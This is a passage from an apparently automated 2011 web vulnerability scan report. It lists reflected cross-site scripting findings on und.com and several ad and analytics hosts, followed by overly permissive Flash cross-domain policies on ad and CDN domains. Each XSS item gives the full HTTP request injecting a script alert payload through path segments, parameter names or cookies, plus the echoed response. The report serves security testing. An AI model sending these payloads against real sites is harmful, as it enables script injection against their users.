The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b5"><script>alert(1)</script>815941a6815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.99. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c09fe"><script>alert(1)</script>185ebd9758c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:03 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.100. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c242"><script>alert(1)</script>4a7447b872b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:04 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.101. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.und.com
Path:   /sports/m-footbl/9874134

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 827d3"><script>alert(1)</script>ef15667ce85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.102. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf530"-alert(1)-"8e103b168e9 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=cf530"-alert(1)-"8e103b168e9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:11 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^49&9346^125a76039212413077175f84d; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111948; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1308

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188089"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=cf530"-alert(1)-"8e103b168e9\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.103. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf42"><script>alert(1)</script>c5205d82800 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=1cf42"><script>alert(1)</script>c5205d82800; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:34 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^42&9346^125a7603945366735abcf916; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111865; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1413

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1cf42"><script>alert(1)</script>c5205d82800" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

5.104. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload 5ec60<script>alert(1)</script>be5955fe51a was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0 JSP/2.2 (Oracle GlassFish Server 3.1 Java/Sun Microsystems Inc./1.6)
Server: Oracle GlassFish Server 3.1
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:01 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:02 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a');

5.105. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload c7a2a<script>alert(1)</script>9489ac10615 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:54:12 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615"}});

6. Flash cross-domain policy  previous  next
There are 65 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:35 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.2. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:55:06 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:55:05 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.3. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:53:45 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.4. http://api.bit.ly/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:49:05 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Wed, 25 May 2011 20:29:51 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:49:05 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.5. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.6. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.7. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:55:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.8. http://c.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:26:25 GMT
ETag: "14b0e12-e6-e7eb640"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:52:13 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.10. http://cdn.taboolasyndication.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 02 Jan 2011 13:38:59 GMT
ETag: "578002-199-498dd2859a2c0"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
